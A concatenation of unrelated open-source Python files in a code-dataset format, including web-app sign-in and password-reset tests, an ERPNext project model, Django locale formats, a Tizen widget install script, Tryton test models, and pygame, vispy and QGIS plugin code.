assert url_for(controller='person', action='signout', id=None) == '/person/signout'
def test_signin_signout(self, app, db_session):
"""Test person sign in"""
# create a user
p = PersonFactory()
db_session.commit()
resp = do_login(app, p)
assert isSignedIn(app)
# see if we're still logged in when we go to another page
resp = app.get(url_for(controller='home'))
assert isSignedIn(app)
# sign out
resp = resp.goto('/person/signout')
assert not isSignedIn(app)
def test_signin_invalid(self, app, db_session):
"""Test invalid login details"""
do_login(app, 'invalid-email', 'invalid-password')
assert not isSignedIn(app)
def test_signin_unconfirmed(self, app, db_session):
# create a user
p = PersonFactory(activated=False)
db_session.commit()
# Without activation you can log in but not register or put in a proposal
resp = do_login(app, p)
assert isSignedIn(app)
resp.follow()
resp = app.get('/programme/submit_a_proposal')
resp = resp.follow()
assert 'Check your email for activation instructions.' in unicode(resp.body, 'utf-8')
resp = app.get('/register/status')
resp = resp.follow()
assert 'Check your email for activation instructions.' in unicode(resp.body, 'utf-8')
resp = app.get('/registration/new')
resp = resp.follow()
assert 'Check your email for activation instructions.' in unicode(resp.body, 'utf-8')
def test_registration_confirmation(self, app, db_session):
# insert registration model object
p = PersonFactory(activated=False)
db_session.commit()
# visit the link
resp = app.get('/person/confirm/' + p.url_hash)
assert 'Thanks for confirming your account' in unicode(resp.body, 'utf-8')
# Need to forget the objects we created
db_session.expunge_all()
# test that it's activated
r = Person.find_by_id(p.id)
assert r.activated == True
def test_registration_confirmation_invalid_url_hash(self, app, db_session):
"""test that an invalid has doesn't activate anything"""
response = app.get('/person/confirm/nonexistent', status=404)
assert response.status_code == 404
def test_person_password_routing(self, map):
expect = dict(controller='person', action='forgotten_password')
assert map.match('/person/forgotten_password') == expect
def test_person_password_url_for(self):
assert url_for(controller='person', action='forgotten_password') == '/person/forgotten_password'
def test_person_confirm_routing(self, map):
expect = dict(controller='person', action='reset_password', url_hash='N')
assert map.match('/person/reset_password/N') == expect
def test_person_password_url_for(self):
assert url_for(controller='/person', action='reset_password', url_hash='N') == '/person/reset_password/N'
def test_forgotten_password_full_process(self, app, db_session, smtplib):
p = PersonFactory(activated=False)
db_session.commit()
# get the login page
resp = app.get(url_for(controller='person', action='signin', id=None))
# click on the forgotten password link
resp = resp.click('Forgotten your password?')
f = resp.forms['pwreset-form']
f['email_address'] = p.email_address
f.submit()
# check that the confirmation record was created
crecs = PasswordResetConfirmation.find_by_email(p.email_address)
assert crecs is not None
# check our email
assert smtplib.existing != None
# check to address
to_match = re.match(r'^.*To:.*' + p.email_address, smtplib.existing.message, re.DOTALL)
assert to_match != None
# check that the email has no HTML in it and thus was not rendered
# incorrectly
html_match = re.match(r'^.*<!DOCTYPE', smtplib.existing.message, re.DOTALL)
assert html_match == None
# check that the message has a url hash in it
url_match = re.match(r'^.*(/person/reset_password/\S+)', smtplib.existing.message, re.DOTALL)
assert url_match != None
# ok go to the URL, on treadmills
resp = app.get(url_match.group(1))
# set password
f = resp.forms['reset-form']
f['password'] = 'passwdtest'
f['password_confirm'] = 'passwdtest'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
# Need to forget the objects we created, save ones that need saving
pid = p.id
old_hash = p.password_hash
db_session.expunge_all()
# check that the password was changed
p = Person.find_by_id(pid)
assert p.password_hash != old_hash
# check that the confirmatin record is gone
crecs = PasswordResetConfirmation.find_by_email(p.email_address)
assert crecs is None
def test_forgotten_password_no_person(self, app, db_session, smtplib):
"""Test that an invalid email address doesn't start a password change. """
resp = app.get(url_for(controller='person', action='signin'))
resp = resp.click('Forgotten your password?')
f = resp.forms['pwreset-form']
f['email_address'] = 'nonexistent@example.org'
resp = f.submit()
# Old behaviour was to report that the address didn't exist
# This is a mild security leak and was changed at some point
# Change discussed and confirmed in #413
# New behaviour is to display the standard prompt page
# An email is also sent to the given address indicating the attempt
# Standard response page
assert "complete the password reset process" in unicode(resp.body, 'utf-8')
# No reset entry created, no find_all method
assert db_session.query(PasswordResetConfirmation).count() == 0
# Email sent
assert "nonexistent@example.org" in smtplib.existing.to_addresses
def test_confirm_404(self, app):
"""Test that an attempt to access an invalid url_hash throws a 404"""
resp = app.get(url_for(action='reset_password',
controller='person',
url_hash='n'
),
status=404
)
def test_confirm_old_url_hash(self, app, db_session):
"""Test that old url_hashes are caught"""
stamp = datetime.now() - timedelta(days=1.1)
c = PasswordResetConfirmationFactory(timestamp = stamp)
db_session.commit()
resp = app.get(url_for(controller='person',
action='reset_password',
url_hash=c.url_hash))
# TODO: Ensure confirm must match
# Prompted to enter new password
f = resp.forms['reset-form']
f['password'] = 'test'
f['password_confirm'] = 'test'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
# check for warning
assert "This password recovery session has expired" in unicode(resp.body, 'utf-8')
# Need to forget the objects we created
db_session.expunge_all()
# Outstanding confirmation should be gone
crecs = PasswordResetConfirmation.find_by_email(c.email_address)
assert crecs is None
def test_confirm_reset(self, app, db_session):
"""Test confirmation of a password reset that should succeed"""
# create a confirmation record
p = PersonFactory()
# set the timestamp to just under 24 hours ago
stamp = datetime.now() - timedelta(days=0.9)
c = PasswordResetConfirmationFactory(email_address=p.email_address, timestamp=stamp)
db_session.commit()
resp = app.get(url_for(controller='person',
action='reset_password',
url_hash=c.url_hash))
# showing the email on the page
assert c.email_address in unicode(resp.body, 'utf-8')
f = resp.forms['reset-form']
f['password'] = 'test'
f['password_confirm'] = 'test'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
resp = resp.maybe_follow()
# check for success
assert "Your password has been updated" in unicode(resp.body, 'utf-8')
# Need to forget the objects we created, save portions we need
pid = p.id
old_password_hash = p.password_hash
db_session.expunge_all()
# conf rec should be gone
crecs = PasswordResetConfirmation.find_by_email(c.email_address)
assert crecs is None
# password should be changed
p = Person.find_by_id(pid)
assert p.password_hash == old_password_hash
def test_duplicate_password_reset(self, app, db_session, smtplib):
"""Try to reset a password twice. """
p = PersonFactory()
db_session.commit()
resp = app.get(url_for(controller='person', action='signin'))
resp = resp.click('Forgotten your password?')
f = resp.forms['pwreset-form']
f['email_address'] = p.email_address
f.submit()
crec = PasswordResetConfirmation.find_by_email(p.email_address)
assert crec is not None
# submit a second time
resp = f.submit()
assert "password recovery process is already in progress" in unicode(resp.body, 'utf-8')
def test_login_failed_warning(self, app, db_session):
"""Test that you get an appropriate warning message from the form when you try to log in with invalid credentials.
"""
resp = app.get(url_for(controller='person', action='signin', id=None))
f = resp.forms['signin-form']
f['person.email_address'] = 'test@failure.zk'
f['person.password'] = 'broken'
resp = f.submit()
assert "Your sign-in details are incorrect" in unicode(resp.body, 'utf-8')
def test_create_person(self, app, db_session, smtplib):
"""Test the process of creating new persons. """
# get the home page
resp = app.get('/person/signin')
# click on the 'create new account' link
resp = resp.click('Sign up')
# fill out the form
f = resp.form
f['person.email_address'] = 'testguy@example.org'
f['person.firstname'] = 'Testguy'
f['person.lastname'] = 'McTest'
f['person.password'] = 'test'
f['person.password_confirm'] = 'test'
f['person.phone'] = '123'
f['person.mobile'] = '123'
f['person.address1'] = 'here'
f['person.city'] = 'there'
f['person.postcode'] = '1234'
f['person.country'] = 'AUSTRALIA'
f['person.i_agree'] = '1'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
# did we get an appropriate page?
resp = resp.maybe_follow() # Shake out redirects
assert "Check your email" in unicode(resp.body, 'utf-8')
# check our email
assert smtplib.existing is not None
message = smtplib.existing
# check that it went to the right place
assert "testguy@example.org" in message.to_addresses
# check that the message has the to address in it
to_match = re.match(r'^.*To:.*testguy@example.org.*', message.message, re.DOTALL)
assert to_match is not None
# check that the message has the user's name
name_match = re.match(r'^.*Testguy.*McTest', message.message, re.DOTALL)
assert name_match is not None
# check that the message was renderered without HTML, i.e.
# as a fragment and thus no autohandler crap
html_match = re.match(r'^.*<!DOCTYPE', message.message, re.DOTALL)
assert html_match is None
# check that the message has a url hash in it
match = re.match(r'^.*/person/confirm/(\S+)', message.message, re.DOTALL)
assert match is not None
# visit the url
resp = app.get('/person/confirm/%s' % match.group(1))
# check the rego worked
reg = Person.find_by_email('testguy@example.org')
assert reg is not None
assert reg.activated == True
# We should be automatically signed in
assert isSignedIn(app)
# Log out, so we can log in again
resp = resp.goto('/person/signout')
resp = resp.maybe_follow()
assert not isSignedIn(app)
# Ensure login works
resp = resp.click('Sign in')
f = resp.forms['signin-form']
f['person.email_address'] = 'testguy@example.org'
f['person.password'] = 'test'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
assert 'details are incorrect' not in resp
assert isSignedIn(app)
# TODO: Test Config.get('account_creation') == false
def test_create_duplicate_person(self, app, db_session):
# create a fake user
p = PersonFactory()
db_session.commit()
resp = app.get('/person/new')
print resp
f = resp.form
f['person.email_address'] = p.email_address
f['person.firstname'] = 'Testguy'
f['person.lastname'] = 'McTest'
f['person.password'] = 'test'
f['person.password_confirm'] = 'test'
f['person.phone'] = '123'
f['person.mobile'] = '123'
f['person.address1'] = 'here'
f['person.city'] = 'there'
f['person.postcode'] = '1234'
f['person.country'] = 'AUSTRALIA'
f['person.i_agree'] = '1'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
assert 'A person with this email already exists.' in unicode(resp.body, 'utf-8')
resp.click('recover your password')
| gpl-2.0 |
saurabh6790/med_new_app | projects/doctype/project/project.py | 28 | 2184 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.utils import flt, getdate
from webnotes import msgprint
from utilities.transaction_base import delete_events
class DocType:
def __init__(self, doc, doclist=None):
self.doc = doc
self.doclist = doclist
def get_gross_profit(self):
pft, per_pft =0, 0
pft = flt(self.doc.project_value) - flt(self.doc.est_material_cost)
#if pft > 0:
per_pft = (flt(pft) / flt(self.doc.project_value)) * 100
ret = {'gross_margin_value': pft, 'per_gross_margin': per_pft}
return ret
def validate(self):
"""validate start date before end date"""
if self.doc.project_start_date and self.doc.completion_date:
if getdate(self.doc.completion_date) < getdate(self.doc.project_start_date):
msgprint("Expected Completion Date can not be less than Project Start Date")
raise Exception
def on_update(self):
self.add_calendar_event()
def update_percent_complete(self):
total = webnotes.conn.sql("""select count(*) from tabTask where project=%s""",
self.doc.name)[0][0]
if total:
completed = webnotes.conn.sql("""select count(*) from tabTask where
project=%s and status in ('Closed', 'Cancelled')""", self.doc.name)[0][0]
webnotes.conn.set_value("Project", self.doc.name, "percent_complete",
int(float(completed) / total * 100))
def add_calendar_event(self):
# delete any earlier event for this project
delete_events(self.doc.doctype, self.doc.name)
# add events
for milestone in self.doclist.get({"parentfield": "project_milestones"}):
if milestone.milestone_date:
description = (milestone.milestone or "Milestone") + " for " + self.doc.name
webnotes.bean({
"doctype": "Event",
"owner": self.doc.owner,
"subject": description,
"description": description,
"starts_on": milestone.milestone_date + " 10:00:00",
"event_type": "Private",
"ref_type": self.doc.doctype,
"ref_name": self.doc.name
}).insert()
def on_trash(self):
delete_events(self.doc.doctype, self.doc.name)
| agpl-3.0 |
zrhans/pythonanywhere | .virtualenvs/django19/lib/python3.4/site-packages/django/conf/locale/nn/formats.py | 504 | 1810 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y', # '2006-10-25', '25.10.2006', '25.10.06'
# '%d. %b %Y', '%d %b %Y', # '25. okt 2006', '25 okt 2006'
# '%d. %b. %Y', '%d %b. %Y', # '25. okt. 2006', '25 okt. 2006'
# '%d. %B %Y', '%d %B %Y', # '25. oktober 2006', '25 oktober 2006'
]
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%Y-%m-%d', # '2006-10-25'
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M:%S.%f', # '25.10.06 14:30:59.000200'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '\xa0' # non-breaking space
NUMBER_GROUPING = 3
| apache-2.0 |
qiuzhong/crosswalk-test-suite | wrt/wrt-digitalsign-tizen-tests/inst.wgt.py | 12 | 7100 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = ""
PKG_SRC_DIR = ""
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user)
return doCMD(cmd)
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
if line.find("[" + pkg_name + "]") != -1:
pkgidIndex = line.split().index("pkgid")
test_pkg_id = line.split()[pkgidIndex + 1].strip("[]")
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
if return_code != 0:
return True
else:
return False
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith("%s.wgt" % PKG_NAME):
if not doRemoteCopy(
os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
# Do some special copy/delete... steps
'''
(return_code, output) = doRemoteCMD(
"mkdir -p %s/tests" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
if not doRemoteCopy("specname/tests", "%s/tests" % PKG_SRC_DIR):
action_status = False
'''
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
action_status = False
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
global SRC_DIR, PKG_SRC_DIR
SRC_DIR = "/home/%s/content" % PARAMETERS.user
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0:
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket" % str(
userid)
else:
print "[Error] cmd commands error : %s" % str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause |
blueburningcoder/nupic | examples/opf/experiments/multistep/hotgym_best_sp_5step_16K/description.py | 6 | 3267 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'modelParams': { 'clParams': { 'verbosity': 0},
'inferenceType': 'NontemporalMultiStep',
'sensorParams': { 'encoders': { 'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'n': 28,
'name': u'consumption',
'type': 'AdaptiveScalarEncoder',
'w': 21},
'timestamp_dayOfWeek': { 'dayOfWeek': ( 21,
3),
'fieldname': u'timestamp',
'name': u'timestamp_dayOfWeek',
'type': 'DateEncoder'},
'timestamp_timeOfDay': { 'fieldname': u'timestamp',
'name': u'timestamp_timeOfDay',
'timeOfDay': ( 21,
1),
'type': 'DateEncoder'},
'timestamp_weekend': None},
'verbosity': 0},
'spParams': { },
'tpParams': { 'activationThreshold': 13,
'minThreshold': 9,
'verbosity': 0}},
'numRecords': 16000}
mod = importBaseDescription('../hotgym/description.py', config)
locals().update(mod.__dict__)
| agpl-3.0 |
mediafactory/tryton_core_daemon | trytond/test/import_data.py | 1 | 4413 | #This file is part of Tryton. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
"Test for import_data"
from trytond.model import ModelSQL, fields
class ImportDataBoolean(ModelSQL):
"Import Data Boolean"
_name = 'test.import_data.boolean'
_description = __doc__
boolean = fields.Boolean('Boolean')
ImportDataBoolean()
class ImportDataInteger(ModelSQL):
"Import Data Integer"
_name = 'test.import_data.integer'
_description = __doc__
integer = fields.Integer('Integer')
ImportDataInteger()
class ImportDataFloat(ModelSQL):
"Import Data Float"
_name = 'test.import_data.float'
_description = __doc__
float = fields.Float('Float')
ImportDataFloat()
class ImportDataNumeric(ModelSQL):
"Import Data Numeric"
_name = 'test.import_data.numeric'
_description = __doc__
numeric = fields.Numeric('Numeric')
ImportDataNumeric()
class ImportDataChar(ModelSQL):
"Import Data Char"
_name = 'test.import_data.char'
_description = __doc__
char = fields.Char('Char')
ImportDataChar()
class ImportDataText(ModelSQL):
"Import Data Text"
_name = 'test.import_data.text'
_description = __doc__
text = fields.Text('Text')
ImportDataText()
class ImportDataSha(ModelSQL):
"Import Data Sha"
_name = 'test.import_data.sha'
_description = __doc__
sha = fields.Sha('Sha')
ImportDataSha()
class ImportDataDate(ModelSQL):
"Import Data Date"
_name = 'test.import_data.date'
_description = __doc__
date = fields.Date('Date')
ImportDataDate()
class ImportDataDateTime(ModelSQL):
"Import Data DateTime"
_name = 'test.import_data.datetime'
_description = __doc__
datetime = fields.DateTime('DateTime')
ImportDataDateTime()
class ImportDataSelection(ModelSQL):
"Import Data Selection"
_name = 'test.import_data.selection'
_description = __doc__
selection = fields.Selection([
('select1', 'Select 1'),
('select2', 'Select 2'),
], 'Selection')
ImportDataSelection()
class ImportDataMany2OneTarget(ModelSQL):
"Import Data Many2One Target"
_name = 'test.import_data.many2one.target'
_description = __doc__
name = fields.Char('Name')
ImportDataMany2OneTarget()
class ImportDataMany2One(ModelSQL):
"Import Data Many2One"
_name = 'test.import_data.many2one'
_description = __doc__
many2one = fields.Many2One('test.import_data.many2one.target',
'Many2One')
ImportDataMany2One()
class ImportDataMany2ManyTarget(ModelSQL):
"Import Data Many2Many Target"
_name = 'test.import_data.many2many.target'
_description = __doc__
name = fields.Char('Name')
ImportDataMany2ManyTarget()
class ImportDataMany2Many(ModelSQL):
"Import Data Many2Many"
_name = 'test.import_data.many2many'
_description = __doc__
many2many = fields.Many2Many('test.import_data.many2many.relation',
'many2many', 'target', 'Many2Many')
ImportDataMany2Many()
class ImportDataMany2ManyRelation(ModelSQL):
"Import Data Many2Many Relation"
_name = 'test.import_data.many2many.relation'
many2many = fields.Many2One('test.import_data.many2many', 'Many2One')
target = fields.Many2One('test.import_data.many2many.target', 'Target')
ImportDataMany2ManyRelation()
class ImportDataOne2Many(ModelSQL):
"Import Data One2Many"
_name = 'test.import_data.one2many'
_description = __doc__
name = fields.Char('Name')
one2many = fields.One2Many('test.import_data.one2many.target', 'one2many',
'One2Many')
ImportDataOne2Many()
class ImportDataOne2ManyTarget(ModelSQL):
"Import Data One2Many Target"
_name = 'test.import_data.one2many.target'
_description = __doc__
name = fields.Char('Name')
one2many = fields.Many2One('test.import_data.one2many', 'One2Many')
ImportDataOne2ManyTarget()
class ImportDataReferenceSelection(ModelSQL):
"Import Data Reference Selection"
_name = 'test.import_data.reference.selection'
_description = __doc__
name = fields.Char('Name')
ImportDataReferenceSelection()
class ImportDataReference(ModelSQL):
"Import Data Reference"
_name = 'test.import_data.reference'
reference = fields.Reference('Reference', [
('test.import_data.reference.selection', 'Test'),
])
ImportDataReference()
| gpl-3.0 |
ajhalme/kbsim | lib/pgu/text.py | 30 | 2411 | """A collection of text rendering functions"""
def write(s,font,pos,color,text,border=1):
"""Write text to a surface with a black border"""
# Render the text in black, at various offsets to fake a border
tmp = font.render(text,1,(0,0,0))
dirs = [(-1,-1),(-1,0),(-1,1),(0,-1),(0,1),(1,-1),(1,0),(1,1)]
for dx,dy in dirs:
s.blit(tmp,(pos[0]+dx*border,pos[1]+dy*border))
# Now render the text properly, in the proper color
tmp = font.render(text,1,color)
s.blit(tmp,pos)
def writec(s,font,color,text,border=1):
"""Write centered text to a surface with a black border"""
# Center the text within the destination surface
w,h = font.size(text)
x = (s.get_width()-w)/2
y = (s.get_height()-h)/2
write(s,font,(x,y),color,text,border)
def writepre(s,font,rect,color,text):
"""Write preformatted text on a pygame surface"""
r,c,txt = rect,color,text
txt = txt.replace("\t"," ")
tmp = font.render(" ",1,c)
sw,sh = tmp.get_size()
y = r.top
for sentence in txt.split("\n"):
x = r.left
tmp = font.render(sentence,1,c)
s.blit(tmp,(x,y))
y += sh
def writewrap(s, font, rect, color, text, maxlines=None, wrapchar=False):
"""Write wrapped text on a pygame surface.
maxlines -- specifies the maximum number of lines to write
before stopping
wrapchar -- whether to wrap at the character level, or
word level
"""
r,c,txt = rect,color,text
txt = txt.replace("\t", " "*8)
tmp = font.render(" ", 1, c)
sw,sh = tmp.get_size()
y = r.top
row = 1
done = False
for sentence in txt.split("\n"):
x = r.left
if wrapchar:
words = sentence
else:
words = sentence.split(" ")
for word in words:
if (not wrapchar):
word += " "
tmp = font.render(word, 1, c)
(iw, ih) = tmp.get_size()
if (x+iw > r.right):
x = r.left
y += sh
row += 1
if (maxlines != None and row > maxlines):
done = True
break
s.blit(tmp, (x, y))
#x += iw+sw
x += iw
if done:
break
y += sh
row += 1
if (maxlines != None and row > maxlines):
break
| gpl-3.0 |
kkuunnddaannkk/vispy | vispy/visuals/collections/raw_segment_collection.py | 14 | 3516 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
"""
Raw Segment Collection
This collection provides fast raw (& ugly) line segments.
"""
import numpy as np
from vispy import glsl
from . collection import Collection
from ..transforms import NullTransform
class RawSegmentCollection(Collection):
"""
Raw Segment Collection
This collection provides fast raw (& ugly) line segments.
"""
def __init__(self, user_dtype=None, transform=None,
vertex=None, fragment=None, **kwargs):
"""
Initialize the collection.
Parameters
----------
user_dtype: list
The base dtype can be completed (appended) by the used_dtype. It
only make sense if user also provide vertex and/or fragment shaders
transform : string
GLSL Transform code defining the vec4 transform(vec3) function
vertex: string
Vertex shader code
fragment: string
Fragment shader code
color : string
'local', 'shared' or 'global'
"""
base_dtype = [("position", (np.float32, 3), "!local", (0, 0, 0)),
("color", (np.float32, 4), "global", (0, 0, 0, 1)),
("viewport", (np.float32, 4), "global", (0, 0, 512, 512))
]
dtype = base_dtype
if user_dtype:
dtype.extend(user_dtype)
if vertex is None:
vertex = glsl.get('collections/raw-segment.vert')
if transform is None:
transform = NullTransform()
self.transform = transform
if fragment is None:
fragment = glsl.get('collections/raw-segment.frag')
Collection.__init__(self, dtype=dtype, itype=None, mode='lines',
vertex=vertex, fragment=fragment, **kwargs)
self._programs[0].vert['transform'] = self.transform
def append(self, P0, P1, itemsize=None, **kwargs):
"""
Append a new set of segments to the collection.
For kwargs argument, n is the number of vertices (local) or the number
of item (shared)
Parameters
----------
P : np.array
Vertices positions of the path(s) to be added
closed: bool
Whether path(s) is/are closed
itemsize: int or None
Size of an individual path
color : list, array or 4-tuple
Path color
"""
itemsize = itemsize or 1
itemcount = len(P0) / itemsize
V = np.empty(itemcount, dtype=self.vtype)
# Apply default values on vertices
for name in self.vtype.names:
if name not in ['collection_index', 'P']:
V[name] = kwargs.get(name, self._defaults[name])
V = np.repeat(V, 2, axis=0)
V['P'][0::2] = P0
V['P'][1::2] = P1
# Uniforms
if self.utype:
U = np.zeros(itemcount, dtype=self.utype)
for name in self.utype.names:
if name not in ["__unused__"]:
U[name] = kwargs.get(name, self._defaults[name])
else:
U = None
Collection.append(self, vertices=V, uniforms=U, itemsize=itemsize)
| bsd-3-clause |
mlt/siam | hypsometrydialog.py | 1 | 10123 | # -*- coding: utf-8 -*-
# /***************************************************************************
# HypsometryDialog
# A QGIS plugin
# For now only hypsometry around inlets
# -------------------
# begin : 2013-11-05
# copyright : (C) 2013 by Mikhail Titov
# email : mlt@gmx.us
# ***************************************************************************/
#
# /***************************************************************************
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU General Public License as published by *
# * the Free Software Foundation; either version 2 of the License, or *
# * (at your option) any later version. *
# * *
# ***************************************************************************/
from PyQt4 import QtCore, QtGui, uic
from PyQt4.QtCore import QCoreApplication
from qgis.core import *
import logging, logging.config
from os.path import dirname, join
from persistent import PersistentDialog
from hypsometry import Starter
import multiprocessing as mp
import os, sys
import logging
import time
try:
from osgeo import gdal, osr, ogr
from osgeo.gdalconst import *
except ImportError:
import gdal, osr, ogr
from gdalconst import *
